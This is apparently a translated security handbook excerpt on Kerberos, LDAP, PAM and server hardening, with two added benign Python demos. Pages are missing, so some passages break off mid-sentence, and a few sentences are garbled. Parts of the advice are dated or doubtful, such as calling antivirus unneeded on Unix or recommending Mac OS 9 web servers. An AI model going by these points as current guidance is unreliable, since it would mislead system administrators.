First, the Kerberos client has to know how to find the Kerberos server. For this, each client can be configured by hand (traditionally in the krb5.conf file), or the Kerberos servers can be advertised with DNS SRV records, as described in the IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate.
In Kerberos 4, after you enter your username, the workstation sends a message to the Kerberos authentication server.[175] This message contains your username and indicates that you are trying to log in. The Kerberos server looks up your record in its database and, if you are recognized as an authorized user, sends you a ticket-granting ticket that is encrypted with the message digest of your password. The workstation then asks you to enter your password and finally tries to decrypt the encrypted ticket with the password you supplied. If decryption succeeds, the workstation does not store your password and uses the ticket-granting ticket exclusively. If decryption fails, the workstation knows that you supplied an incorrect password and asks you to try again to enter the correct one.
In Kerberos 5, the workstation waits until you have entered your password before it contacts the server. It then sends the Kerberos authentication server a message that contains your username and the current date, encrypted with your password. The server looks up your username, finds your password, and tries to decrypt the encrypted date. If the server can decrypt the date that was sent (in which case the date will naturally be the current date), it creates a ticket-granting ticket, encrypts it with your password, and sends it to you.[176]
The ticket-granting ticket is a block of data that contains a session key and a ticket for the Kerberos ticket-granting service, encrypted with both the session key and the ticket-granting service's key. With it, the user's workstation can contact the Kerberos ticket-granting service to obtain tickets for any principal within the Kerberos realm, that is, the set of servers and users known to the Kerberos server.
For example, when a user first tries to access his files from a Kerberos workstation, system software on the workstation contacts the ticket-granting service and requests a ticket for the file server. The ticket-granting service returns to the user a ticket for the file server. The returned ticket contains another ticket, encrypted with the file server's password, which the user's workstation can present to the file server to request files. That ticket contains the user's authenticated name, an expiration time, and the Internet address of the user's workstation. The user's workstation then presents this ticket to the file server. The file server decrypts the ticket with its own password and then builds a mapping between the user's workstation (UID, IP address) and a UID on the file server. Kerberos places the time of day in requests to prevent a request from being captured and later retransmitted from the same host (for example, in a replay attack by an eavesdropping attacker).
[175] According to the Kerberos papers and documentation, there are logically two kinds of Kerberos server: the authentication server and the ticket-granting service. Some experts consider this view inaccurate, because the whole Kerberos system physically uses only one server: the Kerberos server, or key server.
[176] Why did the protocol change? Kerberos 4 tried to minimize the number of times the user's password was stored on the workstation. Unfortunately, this made it easy to guess Kerberos 4 ticket-granting ticket passwords offline. In Kerberos 5 the workstation must show the Kerberos authentication server that the user knows the correct password. This is a more secure system, although because the user's encrypted ticket-granting ticket is sent from the server to the workstation, it can still be captured by an attacker and attacked with an exhaustive key search.
Kerberos has several security advantages. Passwords are stored on the Kerberos server rather than on individual workstations, and they are never transmitted over the network, whether encrypted or in any other form. The Kerberos authentication server can authenticate the user because the user knows his password, and the user can likewise authenticate the Kerberos server because that server also knows the user's password. Because the user presents a ticket that was issued by the ticket-granting service and is encrypted with the destination service's key, other Kerberos services can authenticate the user as well.
An eavesdropper who captures a ticket from the Kerberos server cannot use it, because it is encrypted with a key (the key of a Kerberos service, or a key derived from the user's password) that the attacker does not know.
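The difference between the Kerberos 4 and Kerberos 5 initial exchanges described above, and the use of a timestamp against replay, shown as an added Python example that is not taken from the handbook or from any Kerberos implementation. The `seal`/`unseal` cipher built from HMAC-SHA256, the `AuthServer` class, the 300-second skew window and the sample user are assumptions that stand in for real Kerberos encryption types and server policy.

```python
import hashlib
import hmac
import os
import struct

MAX_SKEW = 300            # seconds of clock skew tolerated (assumed policy value)
TGT_LIFETIME = 8 * 3600   # assumed ticket lifetime in seconds


def string_to_key(password, principal):
    """Derive the user's long-term key from the password (what the server stores)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), principal.encode(), 10_000)


def _keystream(key, nonce, length):
    out = b""
    for counter in range((length + 31) // 32):
        out += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
    return out[:length]


def seal(key, plaintext):
    """Stand-in authenticated cipher (encrypt-then-MAC); not a Kerberos enctype."""
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()


def unseal(key, blob):
    """Return the plaintext; raise ValueError for a wrong key or altered data."""
    enc_key = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(key, b"mac", hashlib.sha256).digest()
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if len(blob) < 48 or not hmac.compare_digest(tag, expected):
        raise ValueError("decryption failed")
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct))))


class AuthServer:
    def __init__(self, passwords, tgs_key):
        self.user_keys = {u: string_to_key(p, u) for u, p in passwords.items()}
        self.tgs_key = tgs_key

    def _issue_tgt(self, user, now):
        session_key = os.urandom(32)
        # The inner ticket can be read only by the ticket-granting service.
        ticket = seal(self.tgs_key,
                      struct.pack(">Q", now + TGT_LIFETIME) + session_key + user.encode())
        # The reply can be read only by someone who knows the user's password.
        return seal(self.user_keys[user], session_key + ticket)

    def as_request_v4(self, user, now):
        """Kerberos 4 style: naming a valid user is enough to get the encrypted reply."""
        return self._issue_tgt(user, now) if user in self.user_keys else None

    def as_request_v5(self, user, enc_timestamp, now):
        """Kerberos 5 style: the client first proves that it knows the password."""
        key = self.user_keys.get(user)
        if key is None:
            return None
        try:
            (sent_at,) = struct.unpack(">Q", unseal(key, enc_timestamp))
        except (ValueError, struct.error):
            return None                    # wrong password or malformed request
        if abs(now - sent_at) > MAX_SKEW:
            return None                    # stale timestamp: a captured, replayed request
        return self._issue_tgt(user, now)


def client_preauth(user, password, now):
    return seal(string_to_key(password, user), struct.pack(">Q", now))


def client_open_reply(user, password, reply):
    """Workstation side: (session_key, ticket), or None when the password is wrong."""
    try:
        body = unseal(string_to_key(password, user), reply)
    except ValueError:
        return None
    return body[:32], body[32:]


def demo():
    now = 1_700_000_000                    # constructed clock value
    kdc = AuthServer({"alice": "correct horse"}, tgs_key=os.urandom(32))
    good = client_preauth("alice", "correct horse", now)
    guess = client_preauth("alice", "guess", now)
    reply = kdc.as_request_v5("alice", good, now)
    return {
        "v4_replies_without_proof": kdc.as_request_v4("alice", now) is not None,
        "v5_rejects_wrong_password": kdc.as_request_v5("alice", guess, now) is None,
        "v5_accepts_right_password": client_open_reply("alice", "correct horse", reply) is not None,
        "v5_rejects_replay_an_hour_later": kdc.as_request_v5("alice", good, now + 3600) is None,
    }
```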
Obtaining Kerberos
Kerberos or similar security systems are available today from several companies, and they are a standard part of operating systems such as Solaris, Mac OS X, and many versions of Linux and BSD. Since Windows 2000, Microsoft Windows has included a version of Kerberos 5. It is also possible to use Kerberos between Unix machines and Windows platforms.[178]
If you have to install Kerberos from scratch, the MIT Kerberos source code is available to citizens of the United States and Canada at http://web.mit.edu/kerberos/www/ and to others at http://www.crypto-publish.org. At these addresses you can also find official updates, patches, and bug announcements. Several flaws have been found in Kerberos, so it is very important to use the latest version. There is also a free implementation of Kerberos named "Heimdal", which is under active development and is highly compatible with MIT Kerberos. You can obtain Heimdal from http://www.pdc.kth.se/heimdal/. The configuration changes needed to make Kerberos work with your system are critical; if you have to make them yourself, refer to the documentation supplied with Kerberos for more information.
[177] In some configurations, a maximum time can be set for which a key remains valid.
[178] Note that Microsoft has made proprietary changes to the Kerberos protocol, the effect of which is to force Windows clients to use Windows Kerberos servers. In a mixed Windows and Unix environment it is therefore better for the Kerberos servers to be Windows 2000 machines, so that both Windows clients and Unix clients can be used.
Kerberos and LDAP
Kerberos and LDAP (described in the next section) combine well. Kerberos can be used to authenticate and secure LDAP queries and updates. In return, the LDAP database can store user information that is richer than the data protected by Kerberos alone, such as the user's home directory, shell, telephone number, or other organizational information. Together, the two services can provide all of the capabilities of NIS and NIS+, and for this reason they are very widely used.[179]
LDAP is sometimes used to store Kerberos keys. The Windows implementation of Kerberos uses Microsoft Active Directory services (an implementation of LDAP) to store Kerberos keys. Heimdal Kerberos supports this capability, but MIT Kerberos does not; this is no cause for concern, however, because in MIT Kerberos these keys are stored on the Kerberos servers themselves.
Limitations of Kerberos
Although Kerberos is an excellent solution to a fundamental problem, it still has many shortcomings, which are noted below:
Every network service must be individually modified to work with Kerberos
Because of the way Kerberos is designed, any program that is to use Kerberos must be modified. The process of making these modifications to an application is usually called "Kerberizing". It usually requires that the application's source code be available, or that the application use a security framework that is already integrated with Kerberos (such as PAM, which is discussed at the end of this chapter).
[179] Jason Heiss provides a good guide to these applications on a page of his web site titled "Replacing NIS with Kerberos and LDAP", at http://www.ofb.net/~jheiss/krbldap.
not use it. The Kerberos server must always be kept under lock and key, in an environment that is physically secure. If the Kerberos server fails, the entire Kerberos network becomes unusable.
The Kerberos server encrypts all of the stored passwords with the server's master private key, which resides on the same hard disk as the encrypted passwords. This means that if the Kerberos server is compromised, all user passwords must be changed.
Kerberos is a workable system for network security and is widely used. More importantly, its underlying principles are increasingly present in the network security systems that are available directly from vendors.
LDAP
The Lightweight Directory Access Protocol (LDAP) is a low-overhead version of the X.500 directory access service. It is used to store directory information (such as authentication systems, usernames, and passwords) that is accessed over a secure network channel. There are two major versions of LDAP. LDAPv2, described in RFC 1777 in 1995, provides no particular security mechanism for passwords unless its implementation works together with Kerberos. LDAPv3, described in RFC 2251, also supports SASL.[180] SASL provides several other methods of securing password authentication (including Kerberos!). In addition, both the popular open source implementation of LDAPv3 (OpenLDAP 2.x) and the most widely used commercial implementation (Microsoft's Active Directory, in versions beginning with Windows 2000) support the use of SSL/TLS to secure the entire communication link between client and server, including the authentication procedures.
LDAP by itself provides many general directory services. For example, many organizations use LDAP to organize employees' telephone numbers, e-mail addresses, and address lists. We discuss LDAP in this chapter because it can form the basis of a network information and authentication system, and because it is increasingly used for these purposes, especially on Windows and Linux systems.
The LDAP protocol
The information on an LDAP server is organized as a tree of entries, each of which belongs to one or more object classes and contains attributes that hold its values. Each entry includes an attribute named "cn" (common name)[181] that distinguishes it from the other entries with the same parent in the same tree.
For example, an entry that belongs to the object class "posixAccount" contains attributes that specify the user's full name (cn), login name (uid), user ID number and group ID number (uidNumber and gidNumber), home directory (homeDirectory), login shell (loginShell), and other user information.
In LDAP terminology, a schema[182] is a collection of object classes[183] that are logically related, together with their attribute definitions. The posixAccount object class is defined in the network information service schema (nis.schema).
LDAP is a client-server protocol. The LDAP client sends requests to the LDAP server and receives its responses. Clients can send requests to make changes, to perform searches, to return one or more attributes of a particular entry, or to return an entire subtree of the entries held in the server's store.
Replication
An LDAP server can replicate all of its LDAP data stores onto secondary servers, so that critical LDAP information is not lost if the primary server fails.
LDAP is a powerful and flexible replacement for NIS and NIS+. Besides holding authentication data, the main advantages of LDAP are its ability to store and serve data other than authentication-related data, and the availability of communication secured by TLS. The main drawback of LDAP is that updating its database is much more complicated than updating a NIS server, but a variety of tools have been developed to simplify LDAP administration.
[182] Schema
[183] Object Classes
[184] End-to-End Encryption
RFC 2307 describes a way of using LDAP as a network information system. Although this RFC does not specify an Internet standard, its mechanisms are widely used, and a schema that implements it (nis.schema) is included in OpenLDAP 2.x. The schema defines "object classes" that represent users (posixAccount and shadowAccount), groups (posixGroup), services (ipService), protocols (ipProtocol), remote procedure calls (oncRpc), hosts (ipHost), networks (ipNetwork), NIS netgroups (nisNetgroup, nisMap, nisObject), and other items.
Every service that authenticates users must be rewritten to work with LDAP; this is similar to the "kerberizing" process that was required for working with Kerberos. The approach is simple for operating systems such as Microsoft Windows, which force all authentication to go through an application programming interface[185] published by the vendor, but a very small part of the client software still has to be rewritten.
This approach does not work as well for Unix-based operating systems. Instead, two alternative approaches have been developed. Both have been released as open source software by PADL Software and are included in most Linux distributions. The first is nss_ldap, which modifies the C library functions that obtain user information (such as getpwent()) so that they transparently use an LDAP database instead of local files, NIS, and other sources. Many systems already allowed these functions to use different sources of information by means of a name service switch file[186] (usually /etc/nsswitch.conf).[187]
The second approach uses the PAM framework, which is discussed in the next section. LDAP authentication is implemented as a PAM module, pam_ldap. Unlike libnss_ldap, pam_ldap uses the LDAP database only to authenticate the user, and it does not publish any other information from the database. If your LDAP server uses the standard nis.schema, adding LDAP authentication to a PAM-controlled service is as simple as adding a line to the service's PAM configuration file that specifies pam_ldap.so as "sufficient" for authentication, account validation, and password changing.
• LDAP;
• Kerberos 4 or Kerberos 5; and
• an arbitrary Berkeley database file.[189]
Each PAM-aware service is configured either in the file /etc/pam.conf or, more commonly, in its own file in the directory /etc/pam.d. For example, the PAM configuration file for the ssh server on Linux versions is /etc/pam.d/sshd. A service named "other" is used to provide defaults for PAM-aware services that have not been configured explicitly. Below is an example of a PAM configuration file for sshd on a Linux server:
[189] If these layers are not enough for you, some applications, such as SMTP authentication in Sendmail or mailbox access management in the Cyrus imapd server, use the Cyrus SASL (simple authentication and security layer) authentication library, which can authenticate users against a separate database or through PAM! It is not inconceivable that you might want to authenticate a user's imap connection with SASL based on PAM based on LDAP.
different mechanisms can be put into effect. On the other hand, in locations that are physically very secure, passwords can even be dispensed with. PAM gives the administrator the ability to choose the desired policy, so as to match risk and available technology in the best possible way.
PAM, as the examples above made clear, can do much more than authentication alone. One of its strengths is that it clearly separates four phases of the access process: verifying that the account is permitted to use the desired service, at the desired time, and from the desired location (the account phase); authenticating the user (the auth phase); updating passwords and other authentication tokens when that is necessary (the password phase); and setting up and tearing down the user's session (the session phase), which can include limiting access to resources and creating audit trails.
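How a "sufficient" pam_ldap.so line behaves inside a service's stack, and which later modules it bypasses when it succeeds, shown as an added Python example that is not the handbook's own configuration listing or PAM's code. The sshd file content is constructed for the example, and `evaluate` models only the four classic control flags (required, requisite, sufficient, optional) as the Linux-PAM documentation describes them, which is an assumption about the platform.

```python
# Constructed sample of /etc/pam.d/sshd for this example only.
SAMPLE_SSHD = """\
auth      required    pam_nologin.so
auth      sufficient  pam_ldap.so
auth      required    pam_unix.so try_first_pass
account   sufficient  pam_ldap.so
account   required    pam_unix.so
password  sufficient  pam_ldap.so
password  required    pam_unix.so
session   required    pam_unix.so
"""

PHASES = ("auth", "account", "password", "session")
FLAGS = ("required", "requisite", "sufficient", "optional")


def parse_pam(text):
    """Parse 'type control module [args]' lines into tuples."""
    stack = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        # Bracketed controls and include directives are outside this model.
        if len(fields) < 3 or fields[0] not in PHASES or fields[1] not in FLAGS:
            raise ValueError(f"line {lineno}: unsupported entry: {raw!r}")
        stack.append((fields[0], fields[1], fields[2], fields[3:]))
    return stack


def evaluate(stack, phase, outcomes):
    """Decide one phase; 'outcomes' maps module name -> True (success) / False."""
    failed_required = False
    granted = False
    for ptype, flag, module, _args in stack:
        if ptype != phase:
            continue
        ok = outcomes.get(module, False)
        if flag == "requisite" and not ok:
            return False                  # fail at once, nothing else is consulted
        if flag == "sufficient":
            if ok and not failed_required:
                return True               # succeed at once, later modules are skipped
            continue                      # a failed "sufficient" module is ignored
        if ok:
            granted = True
        elif flag == "required":
            failed_required = True        # remember the failure but keep going
    return granted and not failed_required


def skipped_when_sufficient_succeeds(stack, phase, module):
    """Modules that are never consulted once 'module' (sufficient) succeeds."""
    entries = [(flag, name) for ptype, flag, name, _ in stack if ptype == phase]
    for i, (flag, name) in enumerate(entries):
        if name == module and flag == "sufficient":
            return [later for _, later in entries[i + 1:]]
    return []


def demo():
    stack = parse_pam(SAMPLE_SSHD)
    return {
        "ldap_user": evaluate(stack, "auth", {"pam_nologin.so": True, "pam_ldap.so": True}),
        "local_user": evaluate(stack, "auth", {"pam_nologin.so": True, "pam_unix.so": True}),
        "ldap_user_during_nologin": evaluate(stack, "auth", {"pam_ldap.so": True, "pam_unix.so": True}),
        "bypassed_in_account_phase": skipped_when_sufficient_succeeds(stack, "account", "pam_ldap.so"),
    }
```

Because pam_nologin.so is listed before the "sufficient" line it is still enforced for LDAP users, while the local pam_unix.so account check is bypassed for them.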
[190] When a single user holds all of the passwords, this is debatable. The approach can be useful when the passwords are assigned to different users, so that every login requires two or more people and creates a "witnessed" trail.
Chapter Six
Server Security
Overview
A server, in the general sense, is a computer that hosts various server programs, which run on it. In this chapter we discuss some of the most common security problems that arise when computers are used as servers of information services, and we describe how to deploy and configure servers so as to minimize these problems. The chapter first examines host security[191] and then the security considerations of the applications used as mail servers, file servers, web servers, database servers, and name servers.
Host Security
Many organizations that have dedicated servers on the Internet do not secure their servers against outside attack. Users still choose passwords that are easy to guess, and many passwords are easily discovered and stolen by Internet packet sniffers[192].
Today there are thousands of organized and semi-organized groups of attackers who exchange information about computer vulnerabilities and the methods of exploiting them. Techniques, and in many cases complete programs, for penetrating the security layers of systems are widely distributed by e-mail, newsgroups, web pages, and Internet Relay Chat (IRC)[193], and anti-security tools (password sniffers[194], denial-of-service exploits, and Trojan horses) are publicly available as well. Attackers now use automated tools to search for vulnerable computers, and in some cases these tools automatically break into the computers, plant back doors in them, and hide the damage that was done. High-speed Internet connections have made it possible for attackers to scan millions of computers for security vulnerabilities within a short period of time.
The Honeypot Project[195] (http://project.honypot.org/) is an open Internet research project that aims to measure the size of the intruder community by placing vulnerable computers on the Internet and observing how quickly they are attacked. The results of the project are not encouraging at all. For example, in June 2001 it was announced that, according to the project's findings, a Red Hat 6.2 system would on average be compromised by an attacker using a well-known exploit only 72 hours after it was connected to the Internet. A typical system connected to the Internet is scanned by attackers many times a day. Computers that run the Windows 98 operating system and in which file sharing (one of the default settings for most home users)
Policy Development
Security boundaries are in fact defined by developing policy. In some organizations, every user is allowed to install new software on the machines or to change the organization's web pages. In others, users need special access rights and permissions even to view web pages. In some organizations any user can reboot or shut down the system, while in others even much smaller tasks, such as replacing a file, require the signed authorization of the chief information officer.
Policy lets users know what they are permitted to do and what they are not. Policy guides managers and administrators in making decisions about the system and how it is used. Policy helps designers build systems with which the organization's goals can be achieved. The most fundamental component of a security policy is an explicit statement of the actions that are permitted and prohibited for different people. The policies and guidelines should provide answers to the following questions:
• Who is allowed access? What is the nature of that access? And who authorized it?
• Who is responsible for security, upgrades, backups, and support?
• What kinds of information may be made available to the public?
• Which outside departments and users are allowed to access the information provided?
• What must be reviewed and evaluated before software is installed and web pages are uploaded?
• How should complaints and requests about the server and its content be handled?
Your security policy documents should be in writing and available to everyone who is associated with your organization. Attention to policy development can prevent many problems from arising.
One part of the security policy that should be reviewed from time to time is the method used to destroy storage media. Server hard disks, old backup tapes, and even workstations may contain confidential and valuable data. These items must be protected from compromise not only while they are in service; there must also be a clear and effective policy for destroying them, and for making the information on them unrecoverable, when they are taken out of service. Completely destroying a hard disk is usually very difficult.
Choosing a Vendor
Today organizations have many options when choosing the companies that install information servers. Should your computer run Windows, Mac OS, Unix, or a free Unix-like operating system? Should it use an Intel-compatible microprocessor, or a SPARC, a Power PC, or some other type? Should the computer be bought with after-sales service or without it? What level of after-sales service is appropriate for your work? Many purchasing decisions are made on the basis of factors such as the cost of the system, the vendor's reputation, and the experience of the person who makes the purchase, and only a few organizations base their purchases on the security level of the system in question.
Some vendors and some platforms inherently offer better security than others, because different producers place different values on code quality and security. But the size of the customer organization also affects the security of a system, because if a large number of well-funded adversaries publish their findings, even systems that are fairly secure can become insecure.
One of the greatest threats to system security is the presence of software bugs, which can stop the system from working, corrupt information, or, worst of all, enable outsiders to gain unauthorized access to information. It is worth knowing that a very large percentage of organizations still use beta versions of software, or even earlier versions, for their most critical operations!
Because many web sites run on computers with an Intel-compatible microprocessor and an operating system of the Windows NT family, attackers have acquired a very strong incentive to find vulnerabilities in this configuration.[196] For this reason, some organizations have decided to use uncommon configurations, such as OpenBSD on Solaris SPARC computers, solely because far fewer attackers have experience with these systems. For example, if security is your primary concern in setting up a web server, you can run your web server on a Macintosh computer with the OS 7, OS 8, or OS 9 operating system. Because these versions of the Macintosh operating system were not shipped with a command-line interpreter[197], it will be very hard for attackers to break into the system and run programs of their choosing. In addition, these operating systems do not have dozens of network services, each of which could be exploited. Beyond that, Apple in general has a good record of delivering careful, bug-free software.
[196] There have been other reasons, too, why Microsoft products have become an attractive target for attackers, such as the large number of undiscovered vulnerabilities, the complexity of the software, which makes it hard for administrators to secure, and the simple fact that many people do not like Microsoft.
[197] Command-Line Interpreter
Although the operating system in use is very important, the applications and custom software that are installed on top of it are just as important. A simple piece of code written to extend the system's capabilities can make a secure system vulnerable.
Some of the steps that should be followed before a new system is designed and implemented are as follows:
• Investigate which vendors are known for producing bug-free and well-documented software. Find out which specific measures the vendor uses to ensure a high level of security, such as security equipment and specialists, data flow analysis, code audits, or penetration testing. Ask the vendor to give you a copy of its criteria and procedures for review. You should also pay attention to the vendor's past practices in discovering and reporting security flaws in its software. A suitable source for this purpose can be found at http://www.securityfocus.com. (Because the accepted practices for discovering and reporting flaws have evolved, it is recommended that you not use information from before 1997 in your evaluation, since it may not be reliable.)
• Examine how vendors respond to reports of problems with the security or performance of their products. Does the vendor in question take such reports seriously? For example, some vendors ignore user complaints unless the press coverage is very unfavorable.
• See how much importance the vendor in question places on good design with respect to criteria such as security, reliability, and appropriate user interfaces. Systems that are resistant to attack and to user error are more suitable for use in sensitive situations.
• Determine whether it is better for your organization to use older software, whose problems are more or less known, or the latest software on the market, which offers newer features.
• Choose a system that does everything you want well, with the fewest features. Hardware is relatively cheap; buying a separate system that is dedicated to a minimal web server configuration may be a better option than using a system like the organization's standard systems for this purpose, which may lead to a large number of flaws.
Here are some of the items that are needed when purchasing software and systems:
• Assurance that sound software engineering practices were correctly followed in the design, coding, and testing of the software.
• Documentation that shows the results of testing the software in environments similar to your organization's. Ideally, this testing should include both functional testing and testing of performance under critical conditions.
• A written statement of the vendor's policy for accepting, documenting, and responding to reports of flaws in the product.
• A written statement of the vendor's policy on announcing new security flaws to customers and the process for fixing them. (The most responsible vendors do this through FIRST teams and customer mailing lists; vendors that feel less responsibility never announce the flaws and the fixes for them, or they bury the flaws in obscure and unreliable places alongside the announced flaws of other programs.)
• Examples of past announcements and of flaws that were fixed.
Although the computer industry has only recently begun to take security seriously, no vendor, not even a vendor of security products, insures its software against damage caused by vulnerable programs. At present only a few insurance companies have developed policies that cover the risks arising from vulnerabilities and from unwanted changes to web sites. You should examine these policies to find out what coverage exists for different systems. As time passes, insurance policies will evolve to work better for configurations that lead to lower risk (and customers will therefore pay lower premiums for using their various services).[198]
will be. A great many companies place business-critical information only in printed copies that appear to be reliable. The last entries made before an event occurs are usually security warnings. Therefore, glance over all of the record sheets that you receive with the software or hardware to make sure that nothing has been overlooked.
[198] In late 2001, at least one insurance company was charging higher premiums to customers who used systems based on Windows NT and Microsoft IIS.
If you can, you should disconnect the computer from the Internet at the start of the installation process and not connect it to the Internet until the process is finished. Unfortunately, updating the system and installing security patches without an Internet connection is becoming harder every day. Many cases have been reported in which computers were compromised after the operating system had been installed and before the security patches were installed.
Once you are sure that the computer is not connected to the Internet, install the operating system, then the operating system's security patches, and then the applications and their updates. Record everything you do in a notebook that you always keep at hand. Such records will be especially useful when you want to install and set up several computers and would like one day to hand the job over to others.
After doing all of this, and before doing anything else, you should make a complete backup of the computer system. If the computer has been attacked by an intruder before this step is carried out, the backup loses all of its value. After making the first backup you can make any custom settings that are needed. After that, you should make a second backup of the computer system on a different tape or CD.
Finally, make sure that the purchased software and the backups are stored in a secure place and that physical access to the computer is restricted. You can also remove the floppy disk drive or CD drive from the computer, so that an attacker who has physical access to the server for a short time will find it difficult to compromise the computer.
come with built-in access[200]. You can use this capability to block all traffic to one or more chosen ports and so achieve the same result that you would get by disabling the service. (To do this, you can use the IP filtering feature in the advanced TCP/IP settings in the Control Panel.)
Another way of minimizing services is to minimize privileges. Servers that do not need to run under the superuser or administrator account should not be run under those accounts; instead, the accounts of the users who need the privileges of that account should, where possible, be given those privileges. In many cases, each server process should run with its own group and uid. If a server can be confined to a small part of the file system, this should be done (using the chroot() or jail() system calls).
• tools that examine the system over time and watch for unauthorized changes;
• tools that scan the network for network weaknesses;
• tools that monitor the system and the network to detect attacks in progress; and
• tools that record and capture all network activity for later analysis.
Using automated tools is (usually) an inexpensive and effective way to monitor and improve the security of a system. Some of these tools are misused by attackers to reveal the weaknesses of networks on the Internet. You too should therefore have the tools you need at hand.
Intrusion Detection Systems
Intrusion detection systems (IDSs)[206] are the computer world's equivalent of burglar alarms in everyday life. As their name suggests, these tools monitor a computer while it is operating and watch for signs that an attacker is trying to break in.
Intrusion detection systems can be network-based or host-based. A host-based intrusion detection system watches for intrusions into that particular host. Most of these programs rely on the operating system's secure auditing systems. Network-based intrusion detection systems monitor a network for signs of an intrusion into another computer. Most of these systems are sophisticated network monitoring systems that use Ethernet interfaces as packet sniffers. One example of a network-based intrusion detection system is snort.
Virus Scanners
There is a large market for virus-scanning tools in the Windows environment. When choosing antivirus software, consider not only the features of the product but also the kind of support that is provided for updating its list of detectable viruses. Many commercial virus scanners use a subscription model under which you can receive weekly updates for as long as your subscription continues.
Unix and Linux systems do not need antivirus tools. Only 3 or 4 viruses have been reported for these platforms, and they do not spread particularly well. In these environments an integrity-monitoring program (such as Tripwire), by the nature of what it does, also does the job of an antivirus. Older Mac OS systems, by contrast, need antivirus tools to deal with virus-infected macros in Microsoft Office products.
On the other hand, a Unix mail server can serve as an antivirus gateway that protects Windows mail clients. Many antivirus products can detect Windows viruses, and they can be run on Unix machines for that purpose alone.
These systems usually run on computers with large disks. For example, an 80-gigabyte hard disk can hold about two weeks of traffic from a typical T1 network, so that if an intrusion or any other incident occurs, the recorded traffic can be analyzed.
Spam
Unsolicited commercial e-mail (commonly called spam) has become a troublesome and costly problem. When you provide e-mail services, it is vital to be able to make sure that neither outsiders nor authorized internal users can send spam through your e-mail system.
If you run an up-to-date version of the software you use as your MTA, controlling outsiders' access to e-mail services is relatively easy. Most MTA software is now shipped with settings that relay messages only if the recipient is an internal machine or the messages were sent from a trusted computer. A "trusted computer" is a machine that has a particular IP address (this indicator is valid only when the machine is inside an environment protected by a firewall and IP spoofing is also prevented in that environment), or a machine that can authenticate itself to the server using cryptography.
Cryptographic authentication is usually used for mail clients that run on laptops and other devices that obtain their IP addresses dynamically. A widely used method for this is the SMTP AUTH protocol, which is an extension of the SMTP protocol and provides authentication using the "Simple Authentication" and "Security Layer" mechanisms described in RFC 2222. Another approach is to issue TLS certificates to clients and to use the STARTTLS [208] protocol to authenticate them.
People inside your network who send spam can consume your organization's network bandwidth and quickly damage your reputation, and worst of all can cause legal action to be taken against you. [209] A good way to monitor spam sent by people inside the network is to ensure that e-mail destined for addresses outside the network can be sent only through servers that you monitor continuously. A practical way to do this is to block all outbound connections on TCP port 25 (the SMTP service port) at the firewall and allow only the mail servers to make such connections.
Confidentiality and integrity
Most MTA software can be configured to allow or require TLS-encrypted connections. The SMTP protocol has been extended to include a STARTTLS operation, which starts the TLS conversation. Using TLS is strongly recommended, because it protects both the confidentiality and the integrity of messages, and also assures the client that it is connected to the correct server.
Similarly, if you offer POP or IMAP service to your users, most of your current clients can establish SSL/TLS-encrypted connections with your servers, provided you have configured the server to accept these connections or to require them. Because these protocols transmit passwords unencrypted by default, [210] requiring SSL/TLS connections provides a high level of protection for users and for their messages.
Another alternative to unencrypted POP or IMAP service is to give users access to their mailboxes through a web browser, using a web-based e-mail system. An important advantage of webmail is that the web server can be secured with SSL/TLS, so that all web browsers can benefit from a secure connection.
through a web server, and internal users should also transfer files using scp and sftp (part of the SSH suite) or SSL-secured WebDAV.
If you are going to set up an anonymous FTP server [211] so that external users can download and upload files, keep these guidelines in mind:
• Read your FTP server's documentation carefully so that you can set up the anonymous file area correctly, so that users can download files only from the directories you have designated and cannot delete files, rename files, or change the directory structure in those directories;
209 In fact, the high volume of spam sent from countries with ineffective legal rules in this area has so damaged those countries' national reputations that many mail server administrators sometimes refuse to accept any e-mail sent from them.
210 Both POP and IMAP support authentication mechanisms that do not send unencrypted passwords over the network, but enabling them takes more effort than SSL/TLS, and they also do not provide the confidentiality and integrity checking of message encryption.
211 Anonymous FTP Server
• Avoid offering programs as executable files, such as compressed files or archive programs, that may have exploitable vulnerabilities. On Unix machines, if the FTP server itself can list directories, do not even allow the ls file to be executed;
• If your FTP server uses a password file to map file owners' uids to user names, do not use the server's main password file for this; instead create a secondary file and put only unimportant information in it (or do not use a password file at all and let clients see the uids); and
• If you allow file uploads, grant this permission on directories separate from those used for downloads, and make sure users cannot download uploaded files. This blocks misuse of your FTP site's traffic for downloading pirated software. You should also make sure that uploaded files cannot have special characters in their names, and that the upload area is on a separate partition so that filling it does not harm other services. This will prevent these files from being wiped out or deleted in an information attack.
In general it is recommended that you not offer non-anonymous FTP service [212] unless you can protect it through a VPN tunnel or a cryptographic wrapper such as SafeTP (http://safetp.cs.berkley.edu).
Information confidentiality
If you are going to transfer sensitive information, obtain an SSL certificate and use a web server that supports SSL (both Apache and IIS can be configured to use SSL). If you want to build an intranet (or an Internet site restricted to your employees' clients), you can use an SSL certificate that you have signed yourself, or set up your own method for doing this altogether. Otherwise you will normally have to buy an SSL certificate from a recognized certificate authority such as VeriSign, whose signed certificates are present in most popular web browsers. For more information about SSL certificates, see Chapter 4 of this Part.
If you do not use SSL, all HTTP transfers, including the user names and passwords used in HTTP basic authentication and any kind of form the client submits, take place unencrypted. In most cases, if you want to authenticate the user, you have no choice but to implement SSL in order to protect the data in transit.
CGI [213]
CGI was the first means of extending web servers. When a URL for a CGI program is sent to the web server, the server runs that CGI program in a separate process, captures the program's output, and sends the requested results to the web browser that asked for them. Arguments to CGI programs are encoded as environment variables and act like the programs' standard input.
CGI programs can run database queries and display the results, let people perform complex financial calculations, and let users chat with other users on the Internet. In fact, every innovative capability of the World Wide Web, from search engines to web pages that allow package tracking, was originally created using CGI programs.
Plug-ins, loadable modules, [214] and application programming interfaces (APIs) [215]
